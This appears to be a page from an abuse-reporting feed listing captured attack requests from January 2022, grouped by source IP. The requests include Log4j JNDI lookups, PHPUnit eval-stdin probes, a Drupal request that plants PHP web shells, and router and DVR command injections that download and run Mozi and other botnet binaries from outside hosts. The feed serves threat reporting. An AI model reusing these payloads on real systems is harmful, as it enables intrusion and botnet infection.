๐บ๐ธ
162.214.213.31
24 Jan 2022
PHPUnit PHP remote code execution attempt
2022-01-23T07:50:20.074Z
{
GET /vendor/phpunit/phpunit/ ...
show more
PHPUnit PHP remote code execution attempt
2022-01-23T07:50:20.074Z
{
GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 18
<?php phpinfo();?>
}
show less
Hacking
Web App Attack
๐บ๐ธ
54.242.42.203
24 Jan 2022
PHPUnit PHP remote code execution attempt
2022-01-22T22:38:54.330Z
{
GET /vendor/phpunit/phpunit/ ...
show more
PHPUnit PHP remote code execution attempt
2022-01-22T22:38:54.330Z
{
GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
User-Agent: python-requests/2.27.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 19
}
show less
Hacking
Web App Attack
๐บ๐ธ
137.184.126.234
21 Jan 2022
PHPUnit PHP remote code execution attempt
2022-01-21T14:40:01.550Z
{
GET /vendor/phpunit/phpunit/ ...
show more
PHPUnit PHP remote code execution attempt
2022-01-21T14:40:01.550Z
{
GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
User-Agent: python-requests/2.27.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 19
<?php phpinfo(); ?>
}
show less
Hacking
Web App Attack
๐บ๐ธ
209.141.47.28
20 Jan 2022
Apache Log4j logging remote code execution attempt
2022-01-20T18:03:35.741Z
{
GET /$%7Bjndi:ldap: ...
show more
Apache Log4j logging remote code execution attempt
2022-01-20T18:03:35.741Z
{
GET /$%7Bjndi:ldap://192[.]3[.]194[.]202[:]8080/o=tomcat%7D HTTP/1.1
Host: 4161708504
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64)${jndi:ldap://192[.]3[.]194[.]202[:]8080/o=tomcat}
Accept: */*
Accept-Encoding: gzip
}
show less
Exploited Host
Web App Attack
๐ธ๐ฌ
51.79.167.185
19 Jan 2022
PHPUnit PHP remote code execution attempt
2022-01-19T20:52:30.624Z
{
GET /vendor/phpunit/phpunit/ ...
show more
PHPUnit PHP remote code execution attempt
2022-01-19T20:52:30.624Z
{
GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
User-Agent: python-requests/2.27.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 19
}
show less
Hacking
Web App Attack
๐ธ๐ฌ
119.234.41.187
18 Jan 2022
Netgear DGN1000 series routers authentication bypass attempt
2022-01-18T23:12:48.752Z
{
GET /setu ...
show more
Netgear DGN1000 series routers authentication bypass attempt
2022-01-18T23:12:48.752Z
{
GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0
}
show less
Hacking
Exploited Host
Web App Attack
๐จ๐ด
204.199.105.77
18 Jan 2022
MVPower DVR Shell arbitrary command execution attempt
2022-01-18T09:22:24.574Z
{
GET /shell?cd+/t ...
show more
MVPower DVR Shell arbitrary command execution attempt
2022-01-18T09:22:24.574Z
{
GET /shell?cd+/tmp;rm+-rf+*;wget+http://204[.]199[.]105[.]77[:]49503/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
User-Agent: Hello, world
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
}
show less
Hacking
Web App Attack
๐ต๐ญ
103.252.32.206
18 Jan 2022
PHPUnit PHP remote code execution attempt
2022-01-17T22:46:43.330Z
{
GET /vendor/phpunit/phpunit/ ...
show more
PHPUnit PHP remote code execution attempt
2022-01-17T22:46:43.330Z
{
GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
Accept-Language: en-US,en;q=0.9,fr;q=0.8
Cache-Control: max-age=0
referer: anonymousfox[.]co
Upgrade-Insecure-Requests: 1
Content-Length: 29
<?php echo "AnonymousFox"; ?>
}
show less
Hacking
Web App Attack
๐บ๐ธ
152.179.105.149
16 Jan 2022
RealTek UDPServer command injection attempt
2022-01-16T05:31:13.586Z
{
orf;cd /tmp&&/bin/busybox ...
show more
RealTek UDPServer command injection attempt
2022-01-16T05:31:13.586Z
{
orf;cd /tmp&&/bin/busybox wget http://185[.]104[.]194[.]138/w -O -> w&&chmod +x w&&sh w;#
}
show less
Exploited Host
Web App Attack
๐บ๐ธ
18.119.17.140
16 Jan 2022
Drupal unsafe internal attribute remote code execution attempt
2022-01-16T06:13:00.092Z
{
POST /? ...
show more
Drupal unsafe internal attribute remote code execution attempt
2022-01-16T06:13:00.092Z
{
POST /?q=user%2Fpassword&name%5B%23post_render%5D%5B%5D=passthru&name%5B%23type%5D=markup&name%5B%23markup%5D=echo+%27Vuln%21%21+patch+it+Now%21%27+%3E+vuln.htm%3B+echo+%27Vuln%21%21%3C%3Fphp+system%28%24_GET%5B%27cmd%27%5D%29%3B+%3F%3E%27%3E+sites%2Fdefault%2Ffiles%2Fvuln.php%3B+echo+%27Vuln%21%21%3C%3Fphp+system%28%24_GET%5B%27cmd%27%5D%29%3B+%3F%3E%27%3E+vuln.php%3B+cd+sites%2Fdefault%2Ffiles%2F%3B+echo+%27AddType+application%2Fx-httpd-php+.jpg%27+%3E+.htaccess%3B+wget+%27https%3A%2F%2Fraw[.]githubusercontent[.]com%2F04x%2FICG-AutoExploiterBoT%2Fmaster%2Ffiles%2Fup[.]php%27 HTTP/1.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.27.1
Content-Length: 47
Content-Type: application/x-www-form-urlencoded
_triggering_element_name=name&form_id=user_pass
}
show less
Hacking
Web App Attack
๐บ๐ธ
73.24.8.237
14 Jan 2022
MVPower DVR Shell arbitrary command execution attempt
2022-01-14T12:36:44.419Z
{
GET /shell?cd+/t ...
show more
MVPower DVR Shell arbitrary command execution attempt
2022-01-14T12:36:44.419Z
{
GET /shell?cd+/tmp;rm+-rf+*;wget+ 212[.]192[.]216[.]71/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1
User-Agent: Hello, world
Host: 127.0.0.1:80
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
}
show less
Hacking
Web App Attack
๐ฎ๐ณ
210.89.58.50
14 Jan 2022
Netgear DGN1000 series routers authentication bypass attempt
2022-01-14T13:08:07.108Z
{
GET /setu ...
show more
Netgear DGN1000 series routers authentication bypass attempt
2022-01-14T13:08:07.108Z
{
GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0
}
show less
Hacking
Exploited Host
Web App Attack
๐ฎ๐ณ
111.92.77.54
14 Jan 2022
Netgear DGN1000 series routers authentication bypass attempt
2022-01-14T14:07:44.211Z
{
GET /setu ...
show more
Netgear DGN1000 series routers authentication bypass attempt
2022-01-14T14:07:44.211Z
{
GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0
}
show less
Hacking
Exploited Host
Web App Attack
๐ฑ๐บ
107.189.14.205
14 Jan 2022
D-Link multiple products HNAP SOAPAction header command injection attempt
2022-01-14T14:30:44.282Z
...
show more
D-Link multiple products HNAP SOAPAction header command injection attempt
2022-01-14T14:30:44.282Z
{
POST /HNAP1/ HTTP/1.1
User-Agent: Mozila/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
SOAPAction: "http://purenetworks[.]com/HNAP1/GetDeviceSettings/`cd && cd tmp && export PATH=$PATH:. && cd /tmp;wget http://101[.]33[.]238[.]116/sys;chmod 777 sys;sh sys selfrep.dlink;rm -rf sys`"
Content-Length: 0
}
show less
Hacking
Web App Attack
๐ฑ๐บ
107.189.5.125
14 Jan 2022
D-Link multiple products HNAP SOAPAction header command injection attempt
2022-01-14T07:00:07.416Z
...
show more
D-Link multiple products HNAP SOAPAction header command injection attempt
2022-01-14T07:00:07.416Z
{
POST /HNAP1/ HTTP/1.1
User-Agent: Mozila/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
SOAPAction: "http://purenetworks[.]com/HNAP1/GetDeviceSettings/`cd && cd tmp && export PATH=$PATH:. && cd /tmp;wget http://107[.]189[.]1[.]53/wget.sh;chmod 777 wget.sh;sh wget.sh selfrep.dlink;rm -rf wget.sh`"
Content-Length: 0
}
show less
Hacking
Web App Attack
๐ฑ๐บ
107.189.29.181
13 Jan 2022
D-Link multiple products HNAP SOAPAction header command injection attempt
2022-01-13T23:33:08.430Z
...
show more
D-Link multiple products HNAP SOAPAction header command injection attempt
2022-01-13T23:33:08.430Z
{
POST /HNAP1/ HTTP/1.1
User-Agent: Mozila/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
SOAPAction: "http://purenetworks[.]com/HNAP1/GetDeviceSettings/`cd && cd tmp && export PATH=$PATH:. && cd /tmp;wget http://107[.]189[.]1[.]53/wget.sh;chmod 777 wget.sh;sh wget.sh selfrep.dlink;rm -rf wget.sh`"
Content-Length: 0
}
show less
Hacking
Web App Attack
๐ฎ๐ณ
202.164.139.95
13 Jan 2022
GPON Router authentication bypass and command injection attempt
2022-01-13T00:17:23.597Z
{
POST / ...
show more
GPON Router authentication bypass and command injection attempt
2022-01-13T00:17:23.597Z
{
POST /GponForm/diag_Form?images/ HTTP/1.1
Host: 127.0.0.1:80
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Hello, World
Content-Length: 118
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://202[.]164[.]139[.]95[:]37263/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
}
show less
Hacking
Web App Attack
๐ง๐ท
45.231.209.203
13 Jan 2022
MVPower DVR Shell arbitrary command execution attempt
2022-01-13T06:19:27.958Z
{
GET /shell?cd+/t ...
show more
MVPower DVR Shell arbitrary command execution attempt
2022-01-13T06:19:27.958Z
{
GET /shell?cd+/tmp;rm+-rf+*;wget+http://45[.]231[.]209[.]203[:]42224/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
User-Agent: Hello, world
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
}
show less
Hacking
Web App Attack
๐บ๐ธ
75.75.75.75
12 Jan 2022
RealTek UDPServer command injection attempt
2022-01-12T07:32:38.690Z
{
orf;cd /tmp&&/bin/busybox ...
show more
RealTek UDPServer command injection attempt
2022-01-12T07:32:38.690Z
{
orf;cd /tmp&&/bin/busybox wget http://185[.]104[.]194[.]138/h -O -> h&&sh h;#
}
show less
Hacking
Exploited Host
๐ฎ๐ฉ
203.128.84.232
12 Jan 2022
Netgear DGN1000 series routers authentication bypass attempt
2022-01-12T08:25:53.926Z
{
GET /setu ...
show more
Netgear DGN1000 series routers authentication bypass attempt
2022-01-12T08:25:53.926Z
{
GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://203[.]128[.]84[.]232[:]57718/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0
}
show less
Web App Attack
๐ณ๐ฑ
2.56.57.190
12 Jan 2022
D-Link multiple products HNAP SOAPAction header command injection attempt
2022-01-12T16:42:20.973Z
...
show more
D-Link multiple products HNAP SOAPAction header command injection attempt
2022-01-12T16:42:20.973Z
{
POST /HNAP1/ HTTP/1.1
User-Agent: Mozila/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
SOAPAction: "http://purenetworks[.]com/HNAP1/GetDeviceSettings/`cd && cd tmp && export PATH=$PATH:. && cd /tmp;wget http://46[.]3[.]240[.]182/wget.sh;chmod 777 wget.sh;sh wget.sh selfrep.dlink;rm -rf wget.sh`"
Content-Length: 0
}
show less
Web App Attack
๐บ๐ธ
51.81.161.134
12 Jan 2022
massive scan for random non-existent pages seen as an attempted DoS
Jan 12 05:23 PST UTC-8
Hacking
Bad Web Bot
Web App Attack
๐บ๐ธ
23.183.81.90
10 Jan 2022
RealTek UDPServer command injection attempt
2022-01-10T19:27:02.510Z
{
orf;cd /tmp&&/bin/busybox ...
show more
RealTek UDPServer command injection attempt
2022-01-10T19:27:02.510Z
{
orf;cd /tmp&&/bin/busybox wget http://23[.]183[.]81[.]90/h -O -> z&&sh z; #
}
show less
Hacking
๐บ๐ธ
131.153.158.66
10 Jan 2022
PHPUnit PHP remote code execution attempt
2022-01-08T20:25:30.586Z
{
GET /vendor/phpunit/phpunit/ ...
show more
PHPUnit PHP remote code execution attempt
2022-01-08T20:25:30.586Z
{
GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 706
}
show less
Hacking
Web App Attack
๐บ๐ธ
129.213.119.44
07 Jan 2022
PHPUnit PHP remote code execution attempt
2022-01-07T21:09:14.274Z
{
POST //phpunit/phpunit/src/U ...
show more
PHPUnit PHP remote code execution attempt
2022-01-07T21:09:14.274Z
{
POST //phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
User-agent: Mozilla/5.0 (Windows NT 6.3; WOW64) Gecko/20020603 Firefox/22.0
accept-encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
referer: https://www.google.com/
accept-language: en-US,en;q=0.9
Content-Length: 44
}
show less
Hacking
Web App Attack